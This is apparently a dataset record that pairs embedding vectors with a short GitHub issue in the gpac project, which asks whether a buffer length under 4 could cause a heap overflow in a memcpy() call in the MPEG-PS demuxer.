-0.014100558124482632, -0.003716370090842247, 0.013934584334492683, 0.003680288791656494, 0.009749157354235649, 0.020595185458660126, 0.01691489666700363, 0.023856932297348976, -0.02290438674390316, -0.005960624665021896, -0.006079692859202623, 0.0049178763292729855, 0.0017562555149197578, 0.004142128862440586, -0.009352263063192368, 0.013205742463469505, 0.014966508373618126, -0.005480743944644928, 0.00666781747713685, 0.006011138670146465, 0.0035576126538217068, 0.005235391203314066, 0.014605695381760597, 0.024549691006541252, 0.006303396541625261, -0.00594258401542902, 0.023683741688728333, 0.019859127700328827, -0.009308965876698494, 0.009619264863431454, -0.0004516923218034208, -0.015038670971989632, -0.004088007379323244, 0.0008713625138625503, 0.0013016315642744303, -0.032732922583818436, 0.003523335326462984, 0.014483018778264523, 0.010932622477412224, 0.0023452821187675, 0.017982902005314827, 0.008789395913481712, -0.008471881039440632, -0.002733155619353056, -0.0002575300168246031, 0.004232332110404968, -0.022110598161816597, 0.005235391203314066, -0.02377033606171608, -0.018949879333376884, -0.0006318731466308236, 0.00031683858833275735, -0.03342568129301071, 0.001801357138901949, 0.01775198243558407, -0.009713076055049896, -0.03541736677289009, -0.00007757471757940948, 0.017102519050240517, 0.012260413728654385, 0.004903443623334169, 0.008204879239201546, 0.011113028973340988, -0.005643109790980816, -0.012173818424344063, -0.005192094016820192, -0.007306456100195646, 0.013285120949149132, -0.005264256149530411, 0.011733626946806908, -0.0030362382531166077, -0.009763590060174465, 0.008428582921624184, 0.016698408871889114, 0.02504039742052555, 0.010189348831772804, -0.0180261991918087, -0.014822183176875114, -0.009229587391018867, 0.018690094351768494, 0.006779669318348169, 0.018358146771788597, 0.011978979222476482, -0.004250372759997845, 0.0045678880997002125, -0.008890422992408276, 0.0012348812306299806, -0.02714754268527031, -0.009164640679955482, 0.004452427849173546, 0.010600674897432327, 0.03227108344435692, -0.02190854400396347, -0.006083301268517971, -0.00839250162243843, 0.01119240839034319, -0.021374540403485298, -0.027594950050115585, 0.01157486904412508, 0.018690094351768494, -0.0008118284167721868, 0.00907082948833704, -0.018704526126384735, -0.0034674094058573246, -0.008659503422677517, -0.02414558082818985, 0.020335400477051735, -0.010030590929090977, 0.014042828232049942, 0.0017968469765037298, 0.012873794883489609, -0.009778022766113281, 0.02867738902568817, 0.01308306585997343, 0.016972625628113747, -0.02000345289707184, -0.008298690430819988, 0.005011687520891428, 0.012209899723529816, -0.01012440212070942, -0.0285474956035614, -0.010564593598246574, 0.008197663351893425, 0.006801318377256393, -0.0039220331236720085, 0.006707506719976664, -0.01114189438521862, 0.021345674991607666, 0.03481120243668556, 0.016063379123806953, 0.0024914112873375416, 0.008464664220809937, -0.012217115610837936, 0.02853306382894516, -0.00010632697376422584, -0.023221900686621666, -0.008738881908357143, -0.006133814807981253, 0.01057181041687727, 0.007771904114633799, 0.004228724166750908, -0.010081104934215546, 0.01727570965886116, 0.004813240375369787, 0.017578791826963425, 0.01753549464046955, -0.02514142356812954, 0.006436897441744804, -0.011279002763330936, -0.019859127700328827, 0.009027532301843166, 0.0030308261048048735, 0.010073889046907425, -0.018964312970638275, 0.01151713915169239, -0.0018383404240012169, -0.02515585720539093, -0.021980706602334976, -0.006732763722538948, 0.023698173463344574, -0.018199389800429344, -0.002348890295252204, -0.006501843687146902, 0.006931210868060589, -0.003093968378379941, 0.006642560474574566, 0.011755275540053844, 0.019844694063067436, -0.0017661778256297112, 0.007266766391694546, -0.002383167389780283, 0.0025942428037524223, -0.013768610544502735, -0.0026032631285488605, -0.01838701218366623, 0.01293874066323042, -0.0013918346958234906, 0.03504212200641632, -0.004466860555112362, -0.0032707664649933577, -0.014793317764997482, 0.01371087972074747, 0.018430309370160103, -0.01339336484670639, -0.016943762078881264, 0.018055064603686333, -0.02964436635375023, 0.0013918346958234906, 0.008096635341644287, -0.01975809969007969, -0.0032815909944474697, 0.025126991793513298, -0.010283160023391247, 0.02589191496372223, 0.03267519176006317, -0.015182996168732643, -0.0015370618784800172, 0.01753549464046955, 0.01612110808491707, 0.003716370090842247, -0.0018202997744083405, -0.03914095461368561, -0.02000345289707184, 0.004726645536720753, -0.009200721979141235, -0.022745627909898758, -0.004672523587942123, 0.008738881908357143, -0.010737784206867218, -0.009835752658545971, -0.02753722108900547, 0.02013334445655346, 0.007973959669470787, 0.01577472873032093, -0.005920935422182083, 0.009179073385894299, -0.00040794379310682416, 0.004892619326710701, -0.017564358189702034, -0.005340027157217264, -0.016438623890280724, 0.003723586443811655, -0.002662797225639224, 0.01677057147026062, -0.009114127606153488, -0.01879112236201763, 0.029875285923480988, 0.01220268290489912, 0.006180720403790474, 0.0008185936603695154, 0.014735587872564793, 0.011257354170084, -0.003950898535549641, 0.01012440212070942, -0.008103852160274982, -0.012152169831097126, 0.013862421736121178, -0.003842654637992382, 0.01444693747907877, 0.011935682035982609, 0.007656444329768419, 0.0012285669799894094, -0.006931210868060589, -0.03518644720315933, -0.005957016721367836, -0.019960155710577965, -0.020421994850039482, 0.0014143855078145862, -0.024188879877328873, -0.00713687390089035, -0.0007707860204391181, 0.009561534970998764, 0.010932622477412224, 0.013458311557769775, 0.016554083675146103, -0.01627986691892147, 0.020450860261917114, 0.02003231830894947, -0.007432740181684494, -0.010052240453660488, -0.0028377913404256105, 0.003867911407724023, -0.010297592729330063, -0.017246844246983528, 0.003572045126929879, 0.019440583884716034, -0.011618167161941528, -0.01063675619661808, 0.003839046461507678, -0.0009723900584504008, -0.0035792612470686436, -0.01214495301246643, -0.0041601695120334625, -0.004102439619600773, 0.000784767500590533, 0.008782179094851017, 0.01012440212070942, -0.005643109790980816, 0.006415248848497868, -0.026079537346959114, -0.000362391205271706, 0.0014955684309825301, 0.007378618232905865, 0.008731666021049023, 0.0003720880195032805, -0.02541564218699932, 0.0057008396834135056, -0.0180261991918087, -0.0014991764910519123, 0.008233744651079178, -0.009806887246668339, -0.004185426514595747, 0.00734975328668952, 0.019195232540369034, -0.006328653544187546, 0.006202368997037411, -0.00729202339425683, 0.010586243122816086, 0.011401679366827011, -0.012166602537035942, 0.01062954030930996, 0.029456743970513344, -0.010348106734454632, 0.016958193853497505, 0.0044560362584888935, -0.012260413728654385, 0.01551494374871254, 0.011813005432486534, 0.005058593116700649, -0.002623107749968767, -0.015471645630896091, -0.02203843556344509, -0.002982116537168622, -0.0024390933103859425, 0.0019790572114288807, -0.011286219581961632, 0.021331243216991425, -0.005556514486670494, -0.010759432800114155, 0.004502941854298115, -0.0021865246817469597, 0.029500041157007217, 0.01577472873032093, -0.016077810898423195, 0.043990276753902435, 0.0028341831639409065, 0.017420034855604172, 0.009590399451553822, -0.0036261670757085085, 0.00963369756937027, 0.007735822815448046, 0.013862421736121178, -0.006476586684584618, 0.03218448534607887, 0.004023060668259859, -0.009287317283451557, 0.012498550117015839, -0.023929094895720482, -0.000587222573813051, -0.0032815909944474697, -0.005668366327881813, 0.044625308364629745, 0.0015893796226009727, 0.017737548798322678, -0.01182022225111723, -0.0352441780269146, -0.00023204761964734644, 0.008457448333501816, -0.01900761015713215, 0.00938834436237812, -0.038217272609472275, 0.010615107603371143, 0.007973959669470787, 0.008782179094851017, -0.009980077855288982, 0.01653965190052986, 0.005657542031258345, -0.019180798903107643, 0.0038137894589453936, -0.010672837495803833, 0.004463252145797014, -0.021244648844003677, -0.029615500941872597, -0.020219940692186356, -0.014396424405276775, 0.001802259124815464, -0.018300417810678482, 0.007512119133025408, 0.03281951695680618, -0.03564829006791115, -0.01364593394100666, 0.025603264570236206, -0.00478798383846879, 0.027695978060364723, -0.02091270126402378, -0.00943885836750269, -0.005794650875031948, 0.012844929471611977, -0.017939604818820953, 0.009915131144225597, -0.004780767485499382, -0.005018903873860836, -0.010593459010124207, -0.0038967763539403677, -0.005480743944644928, -0.009749157354235649, -0.0010490627028048038, -0.011914033442735672, -0.000011747551980079152, -0.012173818424344063, 0.01088210940361023, -0.02691662311553955, 0.018747825175523758, -0.006620911881327629, 0.025502236559987068, 0.02052302286028862, -0.015081968158483505, -0.03515758365392685, 0.002585222478955984, 0.004622010048478842, -0.006260099355131388, 0.017824145033955574, -0.008608989417552948, 0.0006620911881327629, 0.006584830582141876, -0.00406635832041502, -0.00500447116792202, 0.023308496922254562, 0.010016159154474735, -0.014879913069307804, -0.0022857480216771364, 0.023308496922254562, 0.007685309275984764, 0.01678500324487686, -0.012563495896756649, -0.017174681648612022, 0.003398854983970523, 0.028071222826838493, 0.019570477306842804, -0.012058358639478683, -0.02027766965329647, 0.00046725236461497843, 0.00943885836750269, -0.014995372854173183, 0.012520198710262775, -0.011185191571712494, -0.001447760732844472, 0.0065054516308009624, -0.038361597806215286, -0.0033898346591740847, 0.0059822737239301205, -0.022803358733654022, 0.0017048397567123175, -0.01778084598481655, 0.0012890031794086099, 0.001178955310024321, 0.015442781150341034, -0.005682799033820629, 0.004766334779560566, -0.025329047814011574, -0.009179073385894299, 0.015197427943348885, 0.0016146365087479353, -0.006141031160950661, 0.019729234278202057, -0.024708449840545654, -0.003799356985837221, 0.015399483032524586, -0.008847125805914402, -0.010023375041782856, 0.0042215078137815, 0.01495207566767931, 0.016741706058382988, 0.001291709253564477, 0.0006783277494832873, 0.005690015386790037, 0.0031084008514881134, 0.008681152015924454, 0.004701388534158468, 0.007966742850840092, -0.016063379123806953, 0.003164326772093773, 0.02102816104888916, -0.009424425661563873, 0.013855204917490482, 0.0065054516308009624, -0.01691489666700363, 0.011596518568694592, -0.022731196135282516, 0.011170758865773678, 0.02903820015490055, -0.001367479912005365, -0.029702095314860344, 0.009395561181008816, 0.025372345000505447, -0.005780218634754419, 0.0017273904522880912, -0.01119962427765131, -0.014172720722854137, -0.026988785713911057, -0.010781081393361092, -0.007555416785180569, -0.009792454540729523, 0.0051560127176344395, 0.0037452352698892355, -0.01625100150704384, -0.009648130275309086, 0.005910111125558615, -0.02426104247570038, 0.01627986691892147, 0.011076947674155235, 0.00812550075352192, -0.008572908118367195, 0.005184877663850784, -0.005827124230563641, 0.0007144089904613793, 0.007411091588437557, 0.001835634233430028, -0.00035404739901423454, 0.004885402973741293, 0.02652694471180439, -0.0030019611585885286, 0.0007667268509976566, 0.009431642480194569, 0.0071152253076434135, -0.010795514099299908, -0.011834654025733471, -0.007743039168417454, 0.005639501381665468, 0.0029929408337920904, 0.012945957481861115, 0.008363637141883373, -0.0009096988360397518, 0.006426073145121336, 0.016871599480509758, -0.009106910787522793, -0.013624285347759724, -0.0018942663446068764, 0.005899286363273859, -0.002738568000495434, -0.005137972068041563, -0.013718096539378166, 0.0046364422887563705, 0.020421994850039482, 0.01225319691002369, -0.025083694607019424, 0.024304339662194252, 0.0057008396834135056, 0.0176220890134573, 0.014216017909348011, 0.013458311557769775, 0.014627343975007534, 0.014519100077450275, 0.00682296697050333, -0.0035070988815277815, -0.003131853649392724, 0.00845023151487112, 0.03126080706715584, -0.013746961019933224, 0.0008167896303348243, -0.02538677677512169, 0.0030759277287870646, -0.006812142673879862, 0.0026772296987473965, 0.005249823909252882, 0.0022586870472878218, 0.013494392856955528, -0.006090517155826092, -0.007800769060850143, 0.030972156673669815, 0.00546991964802146, 0.01815609261393547, -0.00900588370859623, 0.004419954959303141, 0.011113028973340988, -0.00813271664083004, 0.029341284185647964, 0.005610636435449123, -0.004109655972570181, 0.005971448961645365, 0.012801632285118103, -0.0024084243923425674, -0.007209036499261856, -0.01716024987399578, -0.0033808143343776464, 0.030741237103939056, 0.025559967383742332, 0.008111068047583103, 0.015702566131949425, -0.004362224601209164, -0.0012186446692794561, -0.0037055457942187786, -0.00787293165922165, 0.018747825175523758, 0.0000361940183211118, 0.027984628453850746, -0.03152059018611908, 0.012715036980807781, -0.01483661588281393, -0.02853306382894516, -0.006245666649192572, 0.0033014356158673763, 0.010701702907681465, -0.013046984560787678, -0.029615500941872597, 0.0020494158379733562, 0.023250766098499298, -0.023063143715262413, 0.023467253893613815, 0.012678955681622028, -0.021980706602334976, 0.024116717278957367, -0.001217742683365941, -0.005040552467107773, 0.005141580011695623, -0.011553220450878143, 0.000647207663860172, -0.002146835206076503, -0.0037849245127290487, 0.028489766642451286, 0.002242450602352619, -0.018040630966424942, 0.02703208290040493, -0.014966508373618126, -0.01296039018779993, -0.0024535260163247585, 0.007952310144901276, -0.014995372854173183, 0.0016777787823230028, -0.005278688855469227, -0.042980000376701355, 0.014995372854173183, 0.0009922347962856293, 0.008912072516977787, 0.014360343106091022, -0.012173818424344063, 0.01640975847840309, -0.017059221863746643, 0.023092009127140045, -0.006364734843373299, 0.0008194957044906914, -0.02050859108567238, -0.0028450076933950186, 0.0040916153229773045, 0.008969802409410477, 0.006011138670146465, 0.005029728170484304, 0.007476037833839655, 0.009489372372627258, -0.004842105787247419, -0.012101655825972557, 0.004661699291318655, -0.02600737474858761, 0.0066389525309205055, 0.02929798513650894, -0.008529610931873322, -0.006682250183075666, -0.0037921408656984568, -0.018473606556653976, -0.00242466083727777, -0.01220268290489912, 0.015962351113557816, -0.007248725742101669, -0.00412408821284771, 0.0027223313227295876, -0.008457448333501816, -0.009402777068316936, 0.006003922317177057, -0.008399718441069126, 0.016207704320549965, -0.029586635529994965, 0.02014777809381485, 0.0005646717618219554, -0.0031859755981713533, 0.00125021580606699, -0.012491333298385143, 0.006458546034991741, 0.009272884577512741, 0.004824065137654543, -0.0000677651260048151, 0.006584830582141876, 0.009604832157492638, 0.0009922347962856293, -0.016352029517292976, 0.0016119304345920682, 0.015009805560112, -0.008320339024066925, -0.0034908622037619352, -0.03224221616983414, 0.014396424405276775, 0.016698408871889114, -0.009929563850164413, 0.00738944299519062, -0.015789160504937172, 0.004152953624725342, 0.01282328087836504, 0.02013334445655346, 0.006700290832668543, -0.0012835909146815538, 0.008284257724881172, -0.004780767485499382, -0.006581222638487816, -0.002076476812362671, 0.00160291010979563, -0.010131618939340115, -0.010528512299060822, -0.02488163858652115, 0.013155228458344936, 0.011697545647621155, 0.00305067072622478, 0.0055132173001766205, 0.008457448333501816, -0.01765095442533493, -0.005296729505062103, -0.017059221863746643, 0.011899600736796856, -0.008551259525120258, 0.018978744745254517, -0.012816064991056919, 0.003719978267326951, 0.008904855698347092, -0.0013900307239964604, 0.0010815358255058527, 0.002861244138330221, 0.005722488276660442, 0.01639532670378685, -0.0030596910510212183, 0.010651188902556896, -0.010391403920948505, 0.013400581665337086, 0.007104401011019945, -0.01941172033548355, 0.008168797940015793, -0.01088932529091835, -0.028735117986798286, -0.0011302456259727478, 0.007216252852231264, -0.011242921464145184, -0.0028017100412398577, -0.02664240449666977, 0.0016615422209724784, 0.007901797071099281, 0.006483803037554026, -0.008724449202418327, -0.005596204195171595, -0.013010903261601925, 0.00775747187435627, -0.0018193976720795035, -0.015933485701680183, 0.008443015627563, -0.0061554634012281895, -0.0045101577416062355, -0.001643501571379602, 0.004907052032649517, -0.003451172960922122, -0.012751118279993534, -0.0077646877616643906, -0.01799733377993107, -0.026093969121575356, 0.0012006040196865797, 0.027060948312282562, 0.015558240935206413, -0.0011609146604314446, 0.014511884190142155, -0.001408071257174015, -0.005184877663850784, -0.0030723195523023605, -0.0008682053885422647, 0.005390540696680546, -0.00738944299519062, -0.004109655972570181, -0.02076837606728077, 0.009561534970998764, 0.0032815909944474697, -0.023856932297348976, -0.01120684016495943, -0.008176014758646488, 0.01812722720205784, -0.01308306585997343, -0.0004735665861517191, -0.004434387199580669, 0.009236803278326988, -0.028489766642451286, 0.022428113967180252, -0.003748843213543296, 0.004780767485499382, 0.017448898404836655, -0.008998666889965534, -0.00016518453776370734, -0.00012808848987333477, 0.0025653778575360775, 0.019238529726862907, -0.010961487889289856, 0.033974118530750275, 0.006115774158388376, 0.0023561064153909683, 0.0018690094584599137, 0.0009408189216628671, 0.008601773530244827, 0.018704526126384735, -0.0016985255060717463, 0.03305043652653694, -0.019989019259810448, 0.01483661588281393, -0.004751902539283037, -0.006786885671317577, 0.0067652370780706406, -0.018069496378302574, 0.007555416785180569, 0.00359549792483449, -0.0037344107404351234, -0.009417209774255753, 0.011120245791971684, -0.031982433050870895, -0.017968468368053436, -0.016828300431370735, -0.009511020965874195, 0.01432426180690527, -0.01082437951117754, 0.0032617461401969194, 0.010470782406628132, 0.028489766642451286, 0.004964781925082207, 0.007894580252468586, 0.02026323787868023, 0.004084398970007896, 0.003671268466860056, -0.003222056897357106, -0.010030590929090977, 0.006685858126729727, -0.0016922112554311752, 0.012087223120033741, -0.0015352577902376652, 0.008623422123491764, -0.008616205304861069, 0.0005908306920900941, 0.007086360361427069, 0.0003914817061740905, 0.020104480907320976, 0.019123069941997528, -0.0018076712731271982, -0.004611185286194086, 0.02765268087387085, -0.007454389240592718, 0.0033086519688367844, -0.006873480509966612, -0.004365833010524511, 0.02889387495815754, 0.0012384894071146846, 0.02727743610739708, 0.02112918719649315, -0.018603499978780746, 0.0061626797541975975, 0.0055060009472072124, 0.004023060668259859, -0.010297592729330063, 0.0060508279129862785, 0.013090282678604126, 0.0020963214337825775, 0.01600564830005169, 0.013155228458344936, -0.007403875235468149, -0.0026068713050335646, 0.009417209774255753, 0.0038967763539403677, -0.01477888599038124, 0.006224018055945635, -0.022861087694764137, 0.00113385368604213, -0.00729202339425683, 0.027205273509025574, -0.002071064431220293, -0.007230685092508793, 0.009272884577512741, -0.0157458633184433, 0.002855831990018487, 0.05360232666134834, 0.0013458310859277844, -0.001328692538663745, -0.010903757996857166, 0.011986196041107178, 0.01126457005739212, -0.02326519787311554, 0.038707979023456573, -0.012693388387560844, 0.0012420974671840668, 0.002004314213991165, -0.0013792063109576702, -0.0013783043250441551, -0.0009985489305108786, 0.00688069686293602, -0.002742175944149494, 0.02714754268527031, 0.00018322517280466855, 0.0016696604434400797, 0.002350694267079234, 0.010449133813381195, 0.0068770889192819595, 0.017044788226485252, -0.0013034356525167823, 0.0010887521784752607, -0.018444741144776344, -0.009604832157492638, -0.012245981022715569, -0.02763824723660946, 0.0049178763292729855, 0.011437760666012764, 0.008659503422677517, 0.005303945858031511, -0.009835752658545971, -0.009922347031533718, 0.017982902005314827, -0.013811907730996609, 0.002276727696880698, -0.0023994040675461292, 0.007043062709271908, -0.006768845021724701, -0.014028395526111126, -0.011935682035982609, -0.0029063457623124123, -0.0005673778941854835, -0.0014206997584551573, 0.012996471486985683, -0.006260099355131388, -0.019960155710577965, 0.005978665314614773, -0.019830262288451195, 0.020624050870537758, -0.004751902539283037, -0.007140481844544411, 0.006970900110900402, 0.0033880306873470545, -0.0008082202984951437, 0.026065105572342873, 0.0027205273509025574, 0.013999530114233494, 0.003810181515291333, 0.01677057147026062, 0.00738944299519062, 0.015370618551969528, -0.004737469833344221, -0.012491333298385143, -0.014569614082574844, 0.0013440271141007543, 0.008551259525120258, 0.014223233796656132, -0.00500086322426796, -0.011639815755188465, 0.0070358463563025, 0.009626480750739574, 0.005213742610067129, 0.013407797552645206, -0.005383324343711138, -0.00447768485173583, -0.019094204530119896, -0.009806887246668339, 0.019556045532226562, -0.012556280009448528, 0.012051141820847988, 0.0039725471287965775, 0.01925296150147915, 0.007335321046411991, -0.03429163247346878, 0.01250576600432396, 0.016164405271410942, 0.012678955681622028, -0.005542082246392965, -0.0006282650283537805, -0.0191663671284914, 0.0015036866534501314, 0.013198526576161385, -0.009258451871573925, -0.012722253799438477, -0.0006246568518690765, 0.026584675535559654, -0.01651078648865223, 0.0021053417585790157, -0.00020904581469949335, 0.015947919338941574, 0.02530018240213394, -0.012729469686746597, 0.015197427943348885, -0.027739275246858597, 0.0180261991918087, 0.03339681774377823, -0.01639532670378685, 0.0057441373355686665, -0.0049250926822423935, -0.013941800221800804, -0.011351165361702442, -0.008096635341644287, -0.01245525199919939, 0.010312025435268879, -0.03264632821083069, 0.0023146129678934813, 0.0045606717467308044, 0.014439721591770649, 0.013176877051591873, 0.003045258577913046, 0.00017307730740867555, 0.0026555811055004597, -0.02613726817071438, 0.016178838908672333, 0.00838528573513031, -0.024708449840545654, -0.0004857440071646124, -0.009561534970998764, 0.006462154444307089, 0.025617696344852448, 0.0014405444962903857, 0.04765613377094269, 0.003254530020058155, 0.00782241765409708, 0.0023795594461262226, 0.003290611319243908, 0.0022929643746465445, 0.006848223973065615, -0.015500511042773724, -0.02978869155049324, 0.00020464841509237885, -0.01765095442533493, 0.007613146677613258, -0.0036893091164529324, -0.003802965162321925, 0.010564593598246574, 0.011019217781722546, -0.0073533616960048676, 0.004921484272927046, -0.022240491583943367, -0.026065105572342873, -0.006011138670146465, 0.0043297517113387585, 0.019945722073316574, -0.0027151149697601795, 0.01714581623673439, -0.001801357138901949, 0.008060554042458534, 0.01244803611189127, -0.007385834585875273, -0.03281951695680618, -0.0018834419315680861, -0.003976155072450638, 0.007829634472727776, 0.025430073961615562, 0.013169661164283752, 0.004982822574675083, -0.008796611800789833, 0.021706487983465195, -0.024939369410276413, -0.016294298693537712, 0.014136639423668385, -0.0037777083925902843, -0.014071692712605, -0.007598713971674442, -0.0005412189639173448, 0.02190854400396347, 0.002742175944149494, 0.007858498953282833, 0.01939728669822216, 0.006238450296223164, -0.006011138670146465, 0.015096400864422321, -0.009409993886947632, 0.00932339858263731, -0.0024300729855895042, -0.01801176741719246, -0.0027584126219153404, -0.004351400304585695, -0.011495490558445454, -0.010586243122816086, 0.01727570965886116, -0.010860459879040718, -0.005697231739759445, -0.003954506479203701, -0.014851047657430172, 0.005664758384227753, 0.012029493227601051, 0.022702330723404884, -0.020869402214884758, 0.011726411059498787, 0.008226527832448483, 0.0069384267553687096, -0.0017815124010667205, -0.012159385718405247, -0.02078280784189701, 0.00001780103048076853, 0.01665511168539524, -0.0095831835642457, 0.0123975221067667, 0.020421994850039482, -0.00635391054674983, 0.0062817479483783245, -0.009525453671813011, -0.003604518249630928, 0.0172901414334774, -0.008262609131634235, -0.010052240453660488, 0.007634795270860195, -0.01902204193174839, 0.012015060521662235, 0.024188879877328873, 0.01887771673500538, -0.016828300431370735, 0.0054627032950520515, 0.0033176722936332226, -0.01603451371192932, -0.006303396541625261, 0.008053338155150414, 0.0022171935997903347, 0.013609852641820908, -0.0016164405969902873, 0.02329406328499317, -0.01282328087836504, 0.013198526576161385, 0.005340027157217264, -0.031953565776348114, -0.02478061243891716, -0.010413052514195442, -0.020811673253774643, 0.007483254186809063, 0.014136639423668385, 0.014735587872564793, -0.023957958444952965, -0.006440505385398865, -0.0034619972575455904, -0.005671974737197161, -0.021302377805113792, -0.005740528926253319, 0.012094439938664436, -0.011307868175208569, -0.013977881520986557, -0.008731666021049023, 0.011726411059498787, 0.008421367034316063, -0.010687270201742649, -0.015688132494688034, -0.0033447330351918936, 0.016712840646505356, -0.0020169427152723074, 0.018690094351768494, -0.003940073773264885, -0.00479159178212285, -0.008089419454336166, 0.00625649094581604, 0.005127147771418095, 0.027089811861515045, 0.013869637623429298, 0.0191663671284914, 0.006960075814276934, 0.0075698490254580975, 0.004365833010524511, 0.037726569920778275, 0.013768610544502735, -0.002352498471736908, 0.0013647738378494978, -0.010052240453660488, -0.00563228502869606, -0.011380030773580074, -0.011892384849488735, -0.01825711876153946, 0.011416112072765827, 0.004733861889690161, 0.013227391056716442, 0.0037632756866514683, -0.012224332429468632, -0.015702566131949425, 0.020436428487300873, 0.032328810542821884, -0.03391638770699501, 0.001253823866136372, -0.011798572726547718, -0.010651188902556896, -0.01638089306652546, 0.010427485220134258, 0.009135776199400425, -0.003990587778389454, -0.007371402345597744, -0.003994195722043514, 0.005040552467107773, -0.0027169191744178534, -0.0010797318536788225, 0.013119147159159184, 0.0018942663446068764, -0.02026323787868023, 0.010312025435268879, -0.005404973402619362, -0.003723586443811655, 0.011033650487661362, 0.01538505032658577, 0.03218448534607887, 0.00048799908836372197, 0.002973096212372184, -0.02215389534831047, 0.015024238266050816, 0.008161582052707672, -0.011380030773580074, -0.00025369637296535075, -0.022456979379057884, -0.009590399451553822, 0.006552357692271471, 0.011214056983590126, -0.03137626498937607, 0.002467958489432931, -0.024549691006541252, -0.007201820146292448, 0.02278892695903778, 0.01902204193174839, 0.00044334851554594934, 0.013155228458344936, -0.001962820766493678, -0.004463252145797014, -0.014353126287460327, -0.009785238653421402, 0.01903647556900978 ]
1,789
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/filters/dmx_mpegps.c#L383-L387 If it is possible that `buf_len` smaller than 4 and result in a heap overflow in the `memcpy()`.
Possible heap overflow in m2psdmx_process()
https://api.github.com/repos/gpac/gpac/issues/1812/comments
0
2021-05-26T08:23:22
2021-05-26T15:37:14Z
https://github.com/gpac/gpac/issues/1812
901,984,334
1,812
false
This is a GitHub Issue repo:gpac owner:gpac Title : Possible heap overflow in m2psdmx_process() Issue date: --- start body --- https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/filters/dmx_mpegps.c#L383-L387 If it is possible that `buf_len` smaller than 4 and result in a heap overflow in the `memcpy()`. --- end body ---
355
[ -0.011289332062005997, 0.04089931771159172, -0.024539589881896973, 0.033055610954761505, 0.049919575452804565, 0.02571614645421505, -0.03386799618601799, 0.04140355437994003, -0.019413169473409653, 0.04112342372536659, 0.001349887577816844, 0.02171025425195694, 0.030870579183101654, 0.011002195999026299, 0.0010146042332053185, 0.0032985578291118145, -0.02935786545276642, 0.010497958399355412, -0.005028374958783388, 0.0045171333476901054, 0.012220771983265877, -0.038882363587617874, -0.019875386729836464, 0.035240642726421356, -0.028349390253424644, -0.0015626130625605583, -0.016793930903077126, -0.0019626768771559, 0.024077370762825012, 0.01946919597685337, 0.014496847055852413, 0.0426921620965004, -0.018614791333675385, 0.02077181078493595, 0.03134680539369583, -0.016149627044796944, 0.03215918689966202, 0.0741790309548378, -0.010666037909686565, -0.015407277271151543, 0.0009235612233169377, -0.018880916759371758, -0.036641307175159454, -0.013796515762805939, 0.014118668623268604, 0.03540872409939766, 0.011310341767966747, -0.0015039603458717465, -0.032215215265750885, -0.005364533513784409, 0.03798593953251839, -0.035996999591588974, -0.031010646373033524, -0.03933057561516762, -0.033419784158468246, 0.003953367006033659, 0.02021154575049877, -0.006842231377959251, 0.01458088681101799, 0.03199110925197601, -0.002533446531742811, -0.011982659809291363, -0.006057861261069775, 0.008642081171274185, -0.029413891956210136, -0.012774033471941948, -0.034540314227342606, 0.024259457364678383, 0.005956313107162714, 0.04025501385331154, -0.007269433233886957, -0.04140355437994003, 0.0006202304502949119, 0.028643527999520302, 0.005098408088088036, -0.019119029864668846, 0.031935084611177444, 0.024903761222958565, -0.03750971704721451, 0.04087130352854729, -0.03476442024111748, 0.010652030818164349, -0.02986210398375988, 0.03588494658470154, 0.029553959146142006, -0.01774638146162033, -0.034176141023635864, -0.06538288295269012, -0.019637275487184525, -0.03196309506893158, -0.001321874326094985, -0.0010995193151757121, 0.01031587179750204, 0.022004391998052597, 0.003548926208168268, 0.01115626934915781, -0.03173898905515671, 0.004233499523252249, -0.03070250153541565, -0.030926605686545372, -0.023783233016729355, 0.008600061759352684, -0.00575321726500988, 0.023699192330241203, 0.0443449430167675, 0.004590668249875307, 0.0032792987767606974, -0.026668595150113106, 0.017480256035923958, 0.10790696740150452, 0.033055610954761505, 0.002801323076710105, -0.016779925674200058, 0.0016659117536619306, -0.003501653904095292, 0.014734959229826927, 0.0028993694577366114, -0.020015453919768333, -0.01152744423598051, -0.004019898362457752, 0.008957230485975742, -0.025281939655542374, -0.031374819576740265, 0.015729429200291634, -0.0015661147190257907, 0.038742296397686005, -0.02977806329727173, -0.037061505019664764, -0.03933057561516762, -0.03591296076774597, -0.046754080802202225, -0.01914704218506813, 0.014013618230819702, -0.029469918459653854, -0.012977128848433495, -0.016429759562015533, -0.01148542482405901, 0.036501239985227585, 0.04490520805120468, 0.011863603256642818, -0.06711970269680023, -0.027228860184550285, 0.03905044496059418, -0.002755801659077406, 0.012753022834658623, -0.006481561344116926, -0.017830422148108482, 0.004429592285305262, -0.05120818689465523, 0.012311815284192562, 0.0003499465237837285, -0.0356048159301281, 0.043672624975442886, -0.005735708866268396, 0.03778984770178795, 0.02725687250494957, -0.010210822336375713, 0.019259095191955566, 0.0036067033652216196, -0.0030289306305348873, -0.007367479614913464, -0.008502015843987465, 0.02571614645421505, 0.008291915990412235, -0.009209349751472473, -0.04431693255901337, 0.023124922066926956, 0.02255064994096756, -0.0074795326218008995, 0.013180225156247616, -0.015113137662410736, -0.01840469241142273, -0.008943223394453526, 0.039666734635829926, -0.022662702947854996, -0.02762104570865631, 0.0075355591252446175, 0.04039507731795311, -0.048238784074783325, -0.010392908938229084, 0.004902315326035023, 0.002363616367802024, -0.02348909340798855, -0.0049828533083200455, 0.02021154575049877, -0.007297446485608816, -0.001298238174058497, -0.02236856520175934, 0.010098769329488277, -0.029105747118592262, -0.020883863791823387, -0.0018996471771970391, 0.01918906345963478, -0.019679294899106026, 0.006201428826898336, -0.01836267299950123, -0.06022844463586807, -0.017298169434070587, 0.02799922414124012, 0.013614430092275143, -0.00211324798874557, -0.03487647324800491, -0.010329878889024258, 0.02706078067421913, -0.027088794857263565, -0.016737904399633408, -0.007402495946735144, 0.03182303160429001, 0.00687024462968111, -0.019539227709174156, -0.026500515639781952, -0.023307008668780327, 0.04263613745570183, 0.018180586397647858, -0.04087130352854729, 0.01780240796506405, -0.022466611117124557, -0.01458088681101799, -0.02706078067421913, -0.013222244568169117, 0.05882778391242027, -0.03386799618601799, -0.007087347563356161, -0.013635439798235893, -0.033896010369062424, -0.0028170805890113115, -0.00320926564745605, 0.023923298344016075, -0.030086209997534752, -0.0021447630133479834, 0.03243932127952576, 0.019483201205730438, 0.016793930903077126, -0.002708529122173786, 0.016611846163868904, -0.036221105605363846, -0.012872079387307167, 0.004051413387060165, -0.02348909340798855, 